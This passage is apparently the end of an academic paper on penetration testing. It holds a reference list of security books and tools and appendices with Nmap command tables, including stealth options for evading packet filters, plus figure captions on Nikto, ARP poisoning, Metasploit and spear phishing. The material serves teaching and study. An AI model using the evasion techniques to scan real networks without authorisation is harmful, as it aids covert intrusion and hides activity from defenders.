Khan, E., & Khan, F. (2012). A Comparative Study of White Box, Black Box and Grey Box

Testing Techniques. Sikkim: International Journal of Advanced Computer Science and

Applications.

51

Kim, A. (2017). Even password protected Wi-Fi is unsafe, vulnerable to hacks: Researchers

[Internet]. Retrieved from ProQuest: https://search-proquest-

com.ezproxy.utica.edu/docview/1951664878

Lyon, G. (2008). Nmap Network Scanning. Sunnyvale, California, United States: Insecure.com

LLC.

Merriam-Webster. (2019). Internet. Retrieved from Marriam-Webster: https://www.merriam-

webster.com/dictionary/Internet

Morgan, S. (2017). Cybersecurity Jobs Report: 2017 Edition. Cybersecurity Ventures. Menlo

Park: Herjavec Group. Retrieved from https://www.herjavecgroup.com/wp-

content/uploads/2018/07/HG-and-CV-The-Cybersecurity-Jobs-Report-2017.pdf

MRL. (2017). enum4linux. Retrieved from Portcullis Labs:

https://labs.portcullis.co.uk/tools/enum4linux/

Najera-Gutierrez, G., & Ansari, J. A. (2018). Web Penetration Testing with Kali Linux (Third

ed.). Birmingham, UK: Packt Publishing.

NIST. (2019). Blue Team. Retrieved from Computer Security Resource Center:

https://csrc.nist.gov/glossary/term/Blue-Team

NIST. (2019). Red Team. Retrieved from Computer Security Resource Center:

https://csrc.nist.gov/glossary/term/Red-Team

Offensive Security. (2019). Why Offensive Security. Retrieved from Offensive-Security:

https://www.offensive-security.com/why-offsec/

OWASP. (2019). Penetration Testing Methodologies. Retrieved from OWASP:

https://www.owasp.org/index.php/Penetration_testing_methodologies

52

Patel, R. (2013). Kali Linux Social Engineering : Effectively Perform Efficient and Organized

Social Engineering Tests and Penetration Testing Using Kali Linux. Birmingham, UK:

Packt Publishing.

Pauli, J. (2013). The Basics of Web Hacking : Tools and Techniques to Attack the Web.

Amsterdam, Netherlands: Syngress.

PCI Security Standards. (2019). Responding to a Data Breach . Retrieved from

https://www.pcisecuritystandards.org/documents/PCI_SSC_PFI_Guidance.pdf

Pen test Standard. (2012). PTES Technical Guidelines. Retrieved from Pen test-Standard:

http://www.pen test-

standard.org/index.php/PTES_Technical_Guidelines#Identifying_IP_Ranges

Pen test-Standard. (2012). Cracking Passwords. Retrieved from Penetration Testing Execution

Standard: http://www.pen test-

standard.org/index.php/PTES_Technical_Guidelines#WPA-PSK.2F_WPA2-PSK

Psiinon. (2015). OWASP ZAP User Guide. Retrieved from Github:

https://github.com/zaproxy/zap-core-help/wiki

Sanabria, E. (2018). Why the Best Defense Is a Good Offensive Security Strategy. Retrieved from

Security Intelligence: https://securityintelligence.com/why-the-best-defense-is-a-good-

offensive-security-strategy/

Sanders, C. (2017). Practical Packet Analysis. San Francisco, California, United States: No

Starch Press.

Sharma, H. (2017). Kali Linux - An Ethical Hacker's Cookbook. Birmingham, UK: Packt

Publishing.

53

Sivarajan, S., Chaturvedi, S., Shetty, A., Parikh, K., & Youe, R. (2015). Getting Started with

Windows Server Security. Birmingham, UK: Packt Publishing.

Sood, A., & Enbody, R. (2014). Targeted Cyber Attacks. Waltham, Massachusetts, United

States: Syngress.

Stamparm. (2014). SQLMap Features. Retrieved from Github:

https://github.com/sqlmapproject/sqlmap/wiki/Features

Steube, J. (2019). Retrieved from Hashcat: Advanced Password Recovery:

https://hashcat.net/hashcat/

Sullo, C. (2019). Nikto. Retrieved from Github: https://github.com/sullo/nikto

Teixeira, D., Singh, A., & Agarwal, M. (2018). Metasploit Penetration Testing CookBook (Third

Edition ed.). Birmingham, UK: Packt Publishing.

Velu, V. K. (2017). Mastering Kali Linux for Advanced Penetration Testing. Birmingham, UK:

Packt Publishing.

Yerrid, K. (2013). Instant Netcat Starter. Birmingham, UK: Packt Publishing.

54

Appendix A

Table 1 - Example of Basic Nmap Command Options

option Example in a command Description

-A nmap -A 192.168.1.1

Enables OS detection, version

detection, script scanning,

and traceroute

-sV nmap -sV 192.168.1.1

Attempts to determine the

version of the service running

on port

-sC nmap -sC 192.168.1.1

Scan with default NSE

scripts. Considered useful for

discovery and safe

-f nmap -f 192.168.1.1

Requested scan (including

ping scans) use tiny

fragmented IP packets.

Harder for packet filters

-v nmap -v 192.168.1.1

Increase the verbosity level

(use -vv or more for greater

effect)

-h nmap -h Nmap help screen which

displays many options

-p nmap -p 80 192.168.1.1 Specifies which port to

(Lyon, 2008)

Table 2 - Nmap Stealth Scanning Options

Option Example Description

--spoof-mac-Cisco Spoofs MAC address shown in packets to

show that it is a Cisco device.

--data-length 24 Adds 24 bits randomly to the majority of

packets sent

-T paranoid This sets the speed of the scan to it’s slowest

setting

-- max-hostgroup Limits the number of IPs scanned at once

-- max-parallelism or –scan-delay

Both commands limit the number of scanning

probes sent out, limiting the number of

packets sent out in order to blend-in with

normal traffic

-PN This stops Nmap form pinging active systems

which can expose the scan

55

-f This option fragments packets to obscure the

intentions of the scan

(Beggs, 2017, pp. 66-72)

56

Appendix B

Figure 1. Nikto Options 1

Note: This illustrates the options that Nikto offers when performing a scan

57

Figure 2. Nikto Options 2

Note: This illustrates the rest of the Nikto options when performing a scan

58

Figure 3. ARP Poisoning Before and After

Note: This illustrates how network traffic between two devices changes when an ARP poisoning

attack has been performed

59

Figure 4. Enum4Linux Help Page Output

Note: This illustrates the output of the help page for enum4linux. This shows the options

available when performing enumeration with enum4linux.

60

Figure 5. Syntax for Metasaploit

Note: This illustrates the syntax for Metasploit Framework command-line usage

61

Figure 6. Spear Phishing Model: Targeted Cyber Attack

Note: This figure illustrates the spear phishing attack model used to launch a targeted attack